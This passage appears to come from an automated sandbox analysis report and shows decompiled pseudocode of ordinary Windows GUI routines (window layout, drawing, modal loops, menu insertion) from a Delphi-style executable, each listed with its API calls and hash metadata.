                                                                                					GetTextMetricsA(_t173,  &_v92);
                                                                                					SelectObject(_t173, _t88);
                                                                                					_push(_t173);
                                                                                					_push(0);
                                                                                					L00407080();
                                                                                					_t174 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8);
                                                                                					_t145 =  *(_t142 + 0x21c);
                                                                                					asm("cdq");
                                                                                					_v8 = (_t174 + _t145 - 1) / _t145;
                                                                                					asm("cdq");
                                                                                					_v12 = ( *((intOrPtr*)(_t142 + 0x48)) - 0xa) / _t145;
                                                                                					_t146 = _v92.tmHeight;
                                                                                					_v24 =  *((intOrPtr*)(_t142 + 0x4c)) - _t146 - 5;
                                                                                					asm("cdq");
                                                                                					_v16 = _v24 / _v8;
                                                                                					asm("cdq");
                                                                                					_t34 = _v24 % _v8;
                                                                                					_t156 = _t34 >> 1;
                                                                                					if(_t34 < 0) {
                                                                                						asm("adc edx, 0x0");
                                                                                					}
                                                                                					_v20 = _t156 + _t146 + 1;
                                                                                					_v28 = BeginDeferWindowPos(_t174);
                                                                                					_push(_t177);
                                                                                					_push(0x42e3dd);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t180;
                                                                                					_t111 =  *( *((intOrPtr*)(_t142 + 0x210)) + 8) - 1;
                                                                                					if(_t111 >= 0) {
                                                                                						_t115 = _t111 + 1;
                                                                                						_t186 = _t115;
                                                                                						_v36 = _t115;
                                                                                						_v24 = 0;
                                                                                						do {
                                                                                							_t117 = E00413FA4( *((intOrPtr*)(_t142 + 0x210)), _v24);
                                                                                							_t170 = _t117;
                                                                                							 *((intOrPtr*)( *_t117 + 0x70))();
                                                                                							asm("cdq");
                                                                                							_v32 = _v24 / _v8 * _v12 + 8;
                                                                                							if(E004037B0(_t117, _t186) != 0) {
                                                                                								_v32 = E004350A4(_t142) - _v32 - _v12;
                                                                                							}
                                                                                							asm("cdq");
                                                                                							_v28 = DeferWindowPos(_v28, E0043BD14(_t170), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
                                                                                							E004355C0(_t170, 1);
                                                                                							_v24 = _v24 + 1;
                                                                                							_t81 =  &_v36;
                                                                                							 *_t81 = _v36 - 1;
                                                                                						} while ( *_t81 != 0);
                                                                                					}
                                                                                					_pop(_t158);
                                                                                					 *[fs:eax] = _t158;
                                                                                					_push(0x42e3e4);
                                                                                					return EndDeferWindowPos(_v28);
                                                                                				}
                                                                                			}































                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 0042E27E
                                                                                  • Part of subcall function 0041EB60: CreateFontIndirectA.GDI32(?), ref: 0041EC9E
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E28F
                                                                                • GetTextMetricsA.GDI32(00000000,?), ref: 0042E29B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042E2A2
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E2AA
                                                                                • BeginDeferWindowPos.USER32 ref: 0042E302
                                                                                • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042E3A9
                                                                                • EndDeferWindowPos.USER32(?,0042E3E4,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E3D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                Similarity
                                                                                • API ID: DeferWindow$ObjectSelect$B380BeginCreateFontIndirectMetricsText
                                                                                • String ID:
                                                                                • API String ID: 2543476052-0
                                                                                • Opcode ID: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction ID: e380a197be4a0b5e9c39d3c693654ceb05a77081704d619803c21c70eeb1f8a7
                                                                                • Opcode Fuzzy Hash: 04145a869496cb02b33ca182ebaf35b8f27f04055b291b8486f22ebdef0f9f00
                                                                                • Instruction Fuzzy Hash: 02414E71A001199FCB00DFAED885BAEBBF5EF48315F14406AF904EB391D678AD01CBA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 74%
                                                                                			E0045227C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                				intOrPtr* _v8;
                                                                                				intOrPtr _v12;
                                                                                				intOrPtr _v16;
                                                                                				intOrPtr _v20;
                                                                                				short _v22;
                                                                                				intOrPtr _v28;
                                                                                				struct HWND__* _v32;
                                                                                				char _v36;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr _t58;
                                                                                				intOrPtr _t59;
                                                                                				intOrPtr _t60;
                                                                                				intOrPtr _t63;
                                                                                				intOrPtr _t64;
                                                                                				intOrPtr _t66;
                                                                                				intOrPtr _t68;
                                                                                				intOrPtr _t83;
                                                                                				void* _t88;
                                                                                				intOrPtr _t120;
                                                                                				void* _t122;
                                                                                				void* _t125;
                                                                                				void* _t126;
                                                                                				intOrPtr _t127;
                                                                                
                                                                                				_t123 = __esi;
                                                                                				_t122 = __edi;
                                                                                				_t125 = _t126;
                                                                                				_t127 = _t126 + 0xffffffe0;
                                                                                				_push(__ebx);
                                                                                				_push(__esi);
                                                                                				_v36 = 0;
                                                                                				_v8 = __eax;
                                                                                				_push(_t125);
                                                                                				_push(0x45250c);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t127;
                                                                                				E00433F00();
                                                                                				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
                                                                                					_t50 =  *0x486bbc; // 0x41cc7c
                                                                                					E00406520(_t50,  &_v36);
                                                                                					E0040A0B0(_v36, 1);
                                                                                					E00403D80();
                                                                                				}
                                                                                				if(GetCapture() != 0) {
                                                                                					SendMessageA(GetCapture(), 0x1f, 0, 0);
                                                                                				}
                                                                                				ReleaseCapture();
                                                                                				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
                                                                                				_v32 = GetActiveWindow();
                                                                                				_t58 =  *0x46bb1c; // 0x0
                                                                                				_v20 = _t58;
                                                                                				_t59 =  *0x487c00; // 0x2290f1c
                                                                                				_t60 =  *0x487c00; // 0x2290f1c
                                                                                				E00414020( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                                				_t63 =  *0x487c00; // 0x2290f1c
                                                                                				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
                                                                                				_t64 =  *0x487c00; // 0x2290f1c
                                                                                				_v22 =  *((intOrPtr*)(_t64 + 0x44));
                                                                                				_t66 =  *0x487c00; // 0x2290f1c
                                                                                				E004536E4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
                                                                                				_t68 =  *0x487c00; // 0x2290f1c
                                                                                				_v28 =  *((intOrPtr*)(_t68 + 0x48));
                                                                                				_v16 = E0044C690(0, 0x487bfc, _t122, _t123);
                                                                                				_push(_t125);
                                                                                				_push(0x4524ec);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t127;
                                                                                				E004521CC(_v8);
                                                                                				_push(_t125);
                                                                                				_push(0x45244b);
                                                                                				_push( *[fs:edx]);
                                                                                				 *[fs:edx] = _t127;
                                                                                				SendMessageA(E0043BD14(_v8), 0xb000, 0, 0);
                                                                                				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
                                                                                				do {
                                                                                					E0045541C( *0x487bfc, _t122, _t123);
                                                                                					if( *((char*)( *0x487bfc + 0x9c)) == 0) {
                                                                                						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
                                                                                							E0045212C(_v8);
                                                                                						}
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
                                                                                					}
                                                                                					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
                                                                                				} while (_t83 == 0);
                                                                                				_v12 = _t83;
                                                                                				SendMessageA(E0043BD14(_v8), 0xb001, 0, 0);
                                                                                				_t88 = E0043BD14(_v8);
                                                                                				if(_t88 != GetActiveWindow()) {
                                                                                					_v32 = 0;
                                                                                				}
                                                                                				_pop(_t120);
                                                                                				 *[fs:eax] = _t120;
                                                                                				_push(0x452452);
                                                                                				return E004521C4();
                                                                                			}

                                                                                APIs
                                                                                • GetCapture.USER32 ref: 004522F2
                                                                                • GetCapture.USER32 ref: 00452301
                                                                                • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00452307
                                                                                • ReleaseCapture.USER32(00000000,0045250C), ref: 0045230C
                                                                                • GetActiveWindow.USER32 ref: 0045231B
                                                                                • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 004523B1
                                                                                • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00452418
                                                                                • GetActiveWindow.USER32 ref: 00452427
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                • String ID:
                                                                                • API String ID: 862346643-0
                                                                                • Opcode ID: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction ID: b629a4e8d731a575979ed138cee1ab300dc18be91145e05793bf1a9acf88d777
                                                                                • Opcode Fuzzy Hash: 6fb19725fa897b49366f234f17a85424d251169073f2b89c6bdeb30c45be70e6
                                                                                • Instruction Fuzzy Hash: EB513030A00204AFD711EF6AC946B9E77F1EF49304F1544BAF904AB3A2D778AD44DB59
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00439DF0(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
                                                                                				int _v8;
                                                                                				int _v12;
                                                                                				int _v16;
                                                                                				char _v20;
                                                                                				struct tagRECT _v36;
                                                                                				signed int _t54;
                                                                                				intOrPtr _t59;
                                                                                				int _t61;
                                                                                				void* _t63;
                                                                                				void* _t66;
                                                                                				void* _t82;
                                                                                				int _t98;
                                                                                				struct HDC__* _t99;
                                                                                
                                                                                				_t99 = __edx;
                                                                                				_t82 = __eax;
                                                                                				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
                                                                                				_v16 = SaveDC(__edx);
                                                                                				E00433FDC(__edx, _a4, __ecx);
                                                                                				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                                				_t98 = 0;
                                                                                				_v12 = 0;
                                                                                				if((GetWindowLongA(E0043BD14(_t82), 0xffffffec) & 0x00000002) == 0) {
                                                                                					_t54 = GetWindowLongA(E0043BD14(_t82), 0xfffffff0);
                                                                                					__eflags = _t54 & 0x00800000;
                                                                                					if((_t54 & 0x00800000) != 0) {
                                                                                						_v12 = 3;
                                                                                						_t98 = 0xa00f;
                                                                                					}
                                                                                				} else {
                                                                                					_v12 = 0xa;
                                                                                					_t98 = 0x200f;
                                                                                				}
                                                                                				if(_t98 != 0) {
                                                                                					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
                                                                                					DrawEdge(_t99,  &_v36, _v12, _t98);
                                                                                					E00433FDC(_t99, _v36.top, _v36.left);
                                                                                					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
                                                                                				}
                                                                                				E00436848(_t82, _t99, 0x14, 0);
                                                                                				E00436848(_t82, _t99, 0xf, 0);
                                                                                				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
                                                                                				if(_t59 == 0) {
                                                                                					L12:
                                                                                					_t61 = RestoreDC(_t99, _v16);
                                                                                					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
                                                                                					return _t61;
                                                                                				} else {
                                                                                					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
                                                                                					if(_t63 < 0) {
                                                                                						goto L12;
                                                                                					}
                                                                                					_v20 = _t63 + 1;
                                                                                					_v8 = 0;
                                                                                					do {
                                                                                						_t66 = E00413FA4( *((intOrPtr*)(_t82 + 0x19c)), _v8);
                                                                                						_t107 =  *((char*)(_t66 + 0x57));
                                                                                						if( *((char*)(_t66 + 0x57)) != 0) {
                                                                                							E00439DF0(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
                                                                                						}
                                                                                						_v8 = _v8 + 1;
                                                                                						_t36 =  &_v20;
                                                                                						 *_t36 = _v20 - 1;
                                                                                					} while ( *_t36 != 0);
                                                                                					goto L12;
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                • SaveDC.GDI32 ref: 00439E06
                                                                                  • Part of subcall function 00433FDC: GetWindowOrgEx.GDI32(?), ref: 00433FEA
                                                                                  • Part of subcall function 00433FDC: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 00434000
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439E27
                                                                                • GetWindowLongA.USER32 ref: 00439E3D
                                                                                • GetWindowLongA.USER32 ref: 00439E5F
                                                                                • SetRect.USER32 ref: 00439E8B
                                                                                • DrawEdge.USER32(?,?,?,00000000), ref: 00439E9A
                                                                                • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00439EBF
                                                                                • RestoreDC.GDI32(?,?), ref: 00439F30
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 2976466617-0
                                                                                • Opcode ID: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction ID: 0a2c6d2463048ccdf29597ec985fa3fb5adccc33b0d18335653a708fa4918e7f
                                                                                • Opcode Fuzzy Hash: a34654bd2eab7aa8714caa64271e09f7e2008bbca78343f7de88e4e5b9632120
                                                                                • Instruction Fuzzy Hash: 7A416471B001156BDB00EEA9CC81F9E77B8AF48304F10506AFA15EB3C6D67DDD018BA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0045CC58(void* __eax, void* __edx) {
                                                                                				char _v12;
                                                                                				int _v24;
                                                                                				int _v28;
                                                                                				signed int _v48;
                                                                                				signed int _v52;
                                                                                				int _t53;
                                                                                				int _t55;
                                                                                				signed int _t60;
                                                                                				signed int _t63;
                                                                                				int _t82;
                                                                                				int _t84;
                                                                                				signed int _t89;
                                                                                				signed int _t92;
                                                                                				void* _t97;
                                                                                				void* _t111;
                                                                                
                                                                                				_t97 = __eax;
                                                                                				if(__edx == 0) {
                                                                                					E0041295C(0, _t111, 0);
                                                                                					E0041295C(1,  &_v12, 1);
                                                                                					SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                                					SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                                					_t53 = E004350E8(_t97);
                                                                                					_t55 = E004350A4(_t97);
                                                                                					SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t55, _t53, 0);
                                                                                					_t60 = E004350E8(_t97);
                                                                                					_t63 = E004350A4(_t97);
                                                                                					return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t63 * _v52, _t60 * _v48, 0);
                                                                                				}
                                                                                				E0041295C(E0041295C(E004350A4(__eax), _t111, 0) | 0xffffffff,  &_v12, 1);
                                                                                				SetMapMode(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), 8);
                                                                                				SetWindowOrgEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _v28, _v24, 0);
                                                                                				_t82 = E004350E8(_t97);
                                                                                				_t84 = E004350A4(_t97);
                                                                                				SetViewportExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t84, _t82, 0);
                                                                                				_t89 = E004350E8(_t97);
                                                                                				_t92 = E004350A4(_t97);
                                                                                				return SetWindowExtEx(E0041FDC4( *((intOrPtr*)(_t97 + 0x208))), _t92 * _v52, _t89 * _v48, 0);
                                                                                			}



















                                                                                APIs
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CC95
                                                                                • SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCB2
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CCD5
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD00
                                                                                • SetMapMode.GDI32(00000000,00000008), ref: 0045CD36
                                                                                • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0045CD53
                                                                                • SetViewportExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CD76
                                                                                • SetWindowExtEx.GDI32(00000000,00000000,00000000,00000000), ref: 0045CDA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Window$ModeViewport
                                                                                • String ID:
                                                                                • API String ID: 3149394475-0
                                                                                • Opcode ID: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction ID: e0da8c87a236fb087fc382737a2b647bc55f7f1c6ba116ed6a76608d3ac074bb
                                                                                • Opcode Fuzzy Hash: ad73196d661b0662b977ea4ddc5ec0c350c4bd56559773a71098fe9f989c67dc
                                                                                • Instruction Fuzzy Hash: 8B315E703043016BD744FB7ACC86B9B26989F48308F00593FB996EB2D7CA7DC8894369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 26%
                                                                                			E004206FC(void* __ebx) {
                                                                                				intOrPtr _v8;
                                                                                				char _v1000;
                                                                                				char _v1004;
                                                                                				char _v1032;
                                                                                				signed int _v1034;
                                                                                				short _v1036;
                                                                                				void* _t24;
                                                                                				intOrPtr _t25;
                                                                                				intOrPtr _t27;
                                                                                				intOrPtr _t29;
                                                                                				intOrPtr _t45;
                                                                                				intOrPtr _t52;
                                                                                				void* _t54;
                                                                                				void* _t55;
                                                                                
                                                                                				_t54 = _t55;
                                                                                				_v1036 = 0x300;
                                                                                				_v1034 = 0x10;
                                                                                				_t25 = E00402994(_t24, 0x40,  &_v1032);
                                                                                				_push(0);
                                                                                				L00406E20();
                                                                                				_v8 = _t25;
                                                                                				_push(_t54);
                                                                                				_push(0x4207f9);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t55 + 0xfffffbf8;
                                                                                				_push(0x68);
                                                                                				_t27 = _v8;
                                                                                				_push(_t27);
                                                                                				L00406AF8();
                                                                                				_t45 = _t27;
                                                                                				if(_t45 >= 0x10) {
                                                                                					_push( &_v1032);
                                                                                					_push(8);
                                                                                					_push(0);
                                                                                					_push(_v8);
                                                                                					L00406B38();
                                                                                					if(_v1004 != 0xc0c0c0) {
                                                                                						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x424);
                                                                                						_push(8);
                                                                                						_push(_t45 - 8);
                                                                                						_push(_v8);
                                                                                						L00406B38();
                                                                                					} else {
                                                                                						_push( &_v1004);
                                                                                						_push(1);
                                                                                						_push(_t45 - 8);
                                                                                						_push(_v8);
                                                                                						L00406B38();
                                                                                						_push(_t54 + (_v1034 & 0x0000ffff) * 4 - 0x420);
                                                                                						_push(7);
                                                                                						_push(_t45 - 7);
                                                                                						_push(_v8);
                                                                                						L00406B38();
                                                                                						_push( &_v1000);
                                                                                						_push(1);
                                                                                						_push(7);
                                                                                						_push(_v8);
                                                                                						L00406B38();
                                                                                					}
                                                                                				}
                                                                                				_pop(_t52);
                                                                                				 *[fs:eax] = _t52;
                                                                                				_push(E00420800);
                                                                                				_t29 = _v8;
                                                                                				_push(_t29);
                                                                                				_push(0);
                                                                                				L00407080();
                                                                                				return _t29;
                                                                                			}


















                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000), ref: 0042072A
                                                                                • 72E7AD70.GDI32(?,00000068,00000000,004207F9,?,00000000), ref: 00420746
                                                                                • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000068,00000000,004207F9,?,00000000), ref: 00420765
                                                                                • 72E7AEF0.GDI32(?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,004207F9,?,00000000), ref: 00420789
                                                                                • 72E7AEF0.GDI32(?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?,?,00000068,00000000,004207F9), ref: 004207A7
                                                                                • 72E7AEF0.GDI32(?,00000007,00000001,?,?,00000000,00000007,?,?,-00000008,00000001,00C0C0C0,?,00000000,00000008,?), ref: 004207BB
                                                                                • 72E7AEF0.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,004207F9,?,00000000), ref: 004207DB
                                                                                • 72E7B380.USER32(00000000,?,00420800,004207F9,?,00000000), ref: 004207F3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: B380
                                                                                • String ID:
                                                                                • API String ID: 120756276-0
                                                                                • Opcode ID: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction ID: 88d4aa4338388887b010d1d2673664308c814e5b90057e50378935041044e061
                                                                                • Opcode Fuzzy Hash: 0338561309e2c4e19720d96085ce8ceb7eb8d0766d06e6ec529a6cefd21c19a8
                                                                                • Instruction Fuzzy Hash: D12158F1B40328AADB10DB99CD85F9E73BCDB48704F5104A6F705F61C1D678AE509B29
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E00445468(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
                                                                                				char _v5;
                                                                                				char _v12;
                                                                                				char _v13;
                                                                                				struct tagMENUITEMINFOA _v61;
                                                                                				char _v68;
                                                                                				intOrPtr _t103;
                                                                                				CHAR* _t109;
                                                                                				char _t115;
                                                                                				short _t149;
                                                                                				void* _t154;
                                                                                				intOrPtr _t161;
                                                                                				intOrPtr _t184;
                                                                                				struct HMENU__* _t186;
                                                                                				int _t190;
                                                                                				void* _t192;
                                                                                				intOrPtr _t193;
                                                                                				void* _t196;
                                                                                				void* _t205;
                                                                                
                                                                                				_t155 = __ecx;
                                                                                				_v68 = 0;
                                                                                				_v12 = 0;
                                                                                				_v5 = __ecx;
                                                                                				_t186 = __edx;
                                                                                				_t154 = __eax;
                                                                                				_push(_t196);
                                                                                				_push(0x4456c3);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t196 + 0xffffffc0;
                                                                                				if( *((char*)(__eax + 0x3e)) == 0) {
                                                                                					L22:
                                                                                					_pop(_t161);
                                                                                					 *[fs:eax] = _t161;
                                                                                					_push(0x4456ca);
                                                                                					E00404320( &_v68);
                                                                                					return E00404320( &_v12);
                                                                                				}
                                                                                				E004043B8( &_v12,  *((intOrPtr*)(__eax + 0x30)));
                                                                                				if(E004472A4(_t154) <= 0) {
                                                                                					__eflags =  *((short*)(_t154 + 0x60));
                                                                                					if( *((short*)(_t154 + 0x60)) == 0) {
                                                                                						L8:
                                                                                						if((GetVersion() & 0x000000ff) < 4) {
                                                                                							_t190 =  *(0x46baa0 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0046BA94 |  *0x0046BA84 |  *0x0046BA8C | 0x00000400;
                                                                                							_t103 = E004472A4(_t154);
                                                                                							__eflags = _t103;
                                                                                							if(_t103 <= 0) {
                                                                                								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E004047D0(_v12));
                                                                                							} else {
                                                                                								_t109 = E004047D0( *((intOrPtr*)(_t154 + 0x30)));
                                                                                								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044596C(_t154), _t109);
                                                                                							}
                                                                                							goto L22;
                                                                                						}
                                                                                						_v61.cbSize = 0x2c;
                                                                                						_v61.fMask = 0x3f;
                                                                                						_t192 = E00447860(_t154);
                                                                                						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E00446E7C(_t154) == 0) {
                                                                                							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
                                                                                								L14:
                                                                                								_t115 = 0;
                                                                                								goto L16;
                                                                                							}
                                                                                							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
                                                                                							if(_t205 == 0) {
                                                                                								goto L15;
                                                                                							}
                                                                                							goto L14;
                                                                                						} else {
                                                                                							L15:
                                                                                							_t115 = 1;
                                                                                							L16:
                                                                                							_v13 = _t115;
                                                                                							_v61.fType =  *(0x46bad4 + ((E0040471C( *((intOrPtr*)(_t154 + 0x30)), 0x4456e8) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0046BACC |  *0x0046BAA8 |  *0x0046BADC |  *0x0046BAE4;
                                                                                							_v61.fState =  *0x0046BAB4 |  *0x0046BAC4 |  *0x0046BABC;
                                                                                							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
                                                                                							_v61.hSubMenu = 0;
                                                                                							_v61.hbmpChecked = 0;
                                                                                							_v61.hbmpUnchecked = 0;
                                                                                							_v61.dwTypeData = E004047D0(_v12);
                                                                                							if(E004472A4(_t154) > 0) {
                                                                                								_v61.hSubMenu = E0044596C(_t154);
                                                                                							}
                                                                                							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
                                                                                							goto L22;
                                                                                						}
                                                                                					}
                                                                                					_t193 =  *((intOrPtr*)(_t154 + 0x64));
                                                                                					__eflags = _t193;
                                                                                					if(_t193 == 0) {
                                                                                						L7:
                                                                                						_push(_v12);
                                                                                						_push(0x4456dc);
                                                                                						E00444ACC( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
                                                                                						_push(_v68);
                                                                                						E00404698();
                                                                                						goto L8;
                                                                                					}
                                                                                					__eflags =  *((intOrPtr*)(_t193 + 0x64));
                                                                                					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
                                                                                						goto L7;
                                                                                					}
                                                                                					_t184 =  *0x44435c; // 0x4443a8
                                                                                					_t149 = E00403740( *((intOrPtr*)(_t193 + 4)), _t184);
                                                                                					__eflags = _t149;
                                                                                					if(_t149 != 0) {
                                                                                						goto L8;
                                                                                					}
                                                                                					goto L7;
                                                                                				}
                                                                                				_v61.hSubMenu = E0044596C(_t154);
                                                                                				goto L8;
                                                                                			}






















                                                                                APIs
                                                                                • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 00445614
                                                                                • GetVersion.KERNEL32(00000000,004456C3), ref: 00445504
                                                                                  • Part of subcall function 0044596C: CreatePopupMenu.USER32(?,0044567F,00000000,00000000,004456C3), ref: 00445987
                                                                                Strings
